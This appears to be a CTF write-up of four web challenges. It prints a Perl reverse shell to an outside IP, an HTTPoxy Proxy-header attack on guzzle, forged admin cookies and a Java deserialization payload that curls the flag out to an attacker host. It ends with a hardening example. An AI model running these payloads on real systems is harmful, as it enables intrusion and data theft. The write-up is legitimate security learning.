There were many places where my thinking just didn't come around; I was too rigid. Thanks to Master Zhao for the beautifully crafted challenges.

HappyCTFd

A CTFd vulnerability

In short: register a malicious username containing a space, then use the forgot-password flow to change the password.

https://www.colabug.com/2020/0204/6940556/

Checkin

I tried a zillion reverse shells; the one below is the one that worked.

https://zerokeeper.com/experience/a-variety-of-environmental-rebound-shell-method.html

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

```sh
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"174.0.216.98:9000");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
```

The system had no lsof, ps or other process-listing commands, so I walked through /proc one entry at a time myself.

```
app@362cb9dcadd1:/proc$ cd 10
app@362cb9dcadd1:/proc/10$ cd fd
app@362cb9dcadd1:/proc/10/fd$ ls -al
total 0
dr-x------ 2 app app  0 Feb 29 05:47 .
dr-xr-xr-x 9 app app  0 Feb 29 05:43 ..
lrwx------ 1 app app 64 Feb 29 05:47 0 -> /dev/null
l-wx------ 1 app app 64 Feb 29 05:47 1 -> 'pipe:[421276576]'
l-wx------ 1 app app 64 Feb 29 05:47 2 -> 'pipe:[421276577]'
lr-x------ 1 app app 64 Feb 29 05:47 3 -> '/home/app/flag.txt (deleted)'
lrwx------ 1 app app 64 Feb 29 05:47 4 -> 'socket:[421292108]'
app@362cb9dcadd1:/proc/10/fd$ cat 3
flag{85693908-b5aa-4f03-96a8-133fc30854d3}
```

TimeTravel

phpinfo did not reveal anything useful.

Read the composer.json file and look up CVEs for the listed components.

```json
{
    "require": {
        "guzzlehttp/guzzle": "6.2.0"
    }
}
```

https://www.laruence.com/2016/07/19/3101.html

Bring up a host of your own to act as the proxy target.

```php
<?php
// index.php, served with: php -S 0:9999
$arr = array("success" => true);
header("Content-Type: application/json");
echo json_encode($arr);
```

Then send the request with this header:

```
Proxy: http://174.0.216.98:9999
```

EasySpringMVC

A Java web challenge.

Here the Tools class is used to generate the cookie, and Tools inherits from a serializable class, so reading the cookie involves a deserialization step.

```java
// springmvcdemo.war!\WEB-INF\classes\com\filters\ClentInfoFilter.class (decompiled fragment)
String b64 = cookie.getValue();
Base64.Decoder decoder = Base64.getDecoder();
byte[] bytes = decoder.decode(b64);
ClientInfo cinfo = null;
if ((b64.equals("")) || (bytes == null))
{
    // No cookie yet: build a default ClientInfo and serialize it through Tools
    cinfo = new ClientInfo("Anonymous", "normal", ((HttpServletRequest)request).getRequestedSessionId());
    Base64.Encoder encoder = Base64.getEncoder();
    try
    {
        bytes = Tools.create(cinfo);
    }
    catch (Exception e)
    {
        e.printStackTrace();
    }
    cookie.setValue(encoder.encodeToString(bytes));
}
```

PictureController.class contains a file upload and a file include, but both require the admin / webmanager identity. Running the following code in any JSP page overwrites the original cookie, after which we can go and use the file upload.

```jsp
<%@ page import="java.util.Base64, com.tools.Tools" %>
<%-- ClientInfo must also be imported from the application's own package --%>
<%
Base64.Encoder encoder = Base64.getEncoder();
ClientInfo cinfo = new ClientInfo("admin", "webmanager", ((HttpServletRequest)request).getRequestedSessionId());
byte[] bytes = Tools.create(cinfo);
Cookie cookie = new Cookie("cinfo", encoder.encodeToString(bytes));
cookie.setMaxAge(86400);
((HttpServletResponse)response).addCookie(cookie);
((HttpServletRequest)request).getSession().setAttribute("cinfo", cinfo);
%>
```

However, the upload can only store the file under /tmp by modifying the filename, and the JSP include only picks up the filename except for jpg and gif, so the file-include route was not usable here. After the contest I read other people's blogs: it turned out to be a ProcessBuilder vulnerability.

```java
// springmvcdemo.war!\WEB-INF\classes\com\tools\Tools.class
// Whatever object the stream contains is cast to String[] and run as a command
private void readObject(ObjectInputStream in)
    throws IOException, ClassNotFoundException
{
    Object obj = in.readObject();
    new ProcessBuilder((String[])obj).start();
}
```

We can exploit this by overriding writeObject to construct a string array that is handed to ProcessBuilder, which executes the command.

```java
// Added to Tools: writes a command array in place of the object's normal contents
private void writeObject(ObjectOutputStream out) throws IOException {
    String[] cmd = {"/bin/sh", "-c", "curl http://174.0.218.99:9000/`/readflag`"};
    out.writeObject(cmd);
}
```

Add the method above to the Tools class, generate the serialized cookie, send it with the request, and listen on the other side to receive the flag.

```java
import java.io.*;
import java.util.Base64;
import com.tools.*;

public class exp {
    public static void main(String[] args) {
        Base64.Encoder encoder = Base64.getEncoder();
        try {
            // Tools carries the overridden writeObject, so serializing it emits the String[] payload
            Tools cinfo = new Tools();
            byte[] bytes = Tools.create(cinfo);
            String payload = encoder.encodeToString(bytes);
            System.out.println(payload);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```
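The root cause is Tools.readObject: it executes whatever the cookie's serialized stream happens to contain. As an added example (not part of the challenge or this writeup), here is how the cookie-reading side could be hardened with a JEP 290 ObjectInputFilter; it assumes ClientInfo lives in com.tools, is Serializable, and has no serializable superclass of its own, and the class name CookieReader is invented.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InvalidObjectException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.util.Base64;

// Added defensive example, not the challenge's own Tools class.
// Assumption: com.tools.ClientInfo is the only application class a valid cookie contains.
public final class CookieReader {

    // Allow exactly the classes a legitimate cookie holds, reject everything else ("!*"),
    // and cap nesting, array size and stream size. Patterns are matched in order, so the
    // reject-all entry must come after the allowed names. If ClientInfo had a serializable
    // superclass, that class name would have to be listed as well.
    private static final ObjectInputFilter COOKIE_FILTER =
        ObjectInputFilter.Config.createFilter(
            "com.tools.ClientInfo;java.lang.String;!*;maxdepth=3;maxarray=0;maxbytes=4096");

    private CookieReader() {}

    // Decodes the "cinfo" cookie without letting any class outside the allowlist be
    // resolved, so a String[] meant for ProcessBuilder, or any gadget class, is rejected
    // by the filter before it is instantiated and before any readObject hook can run.
    public static ClientInfo parse(String b64) throws IOException, ClassNotFoundException {
        if (b64 == null || b64.isEmpty()) {
            throw new InvalidObjectException("empty cookie");
        }
        byte[] bytes = Base64.getDecoder().decode(b64); // IllegalArgumentException on bad base64
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            in.setObjectInputFilter(COOKIE_FILTER);     // must be set before the first readObject
            Object obj = in.readObject();                // InvalidClassException on a rejected class
            if (!(obj instanceof ClientInfo)) {
                throw new InvalidObjectException("unexpected cookie payload: " + obj.getClass().getName());
            }
            return (ClientInfo) obj;
        }
    }
}
```

Because the cookie value is entirely client-controlled, a signed token or a server-side session lookup removes the deserialization surface altogether; the filter is the minimal in-place hardening when the cookie format cannot be changed.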